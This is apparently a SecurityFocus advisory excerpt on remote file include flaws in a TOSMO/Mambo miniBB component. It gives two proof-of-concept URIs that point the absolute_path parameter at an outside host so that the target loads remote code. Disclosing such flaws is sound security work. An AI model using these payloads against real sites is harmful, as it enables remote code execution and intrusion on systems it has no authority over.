TOSMO/Mambo Absolute_Path Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/components/com_minibb.php?absolute_path=http://www.example2.com/?
http://www.example.com/components/minibb/bb_plugins.php?absolute_path=http://www.example2.com/?


 

Privacy Statement
Copyright 2010, SecurityFocus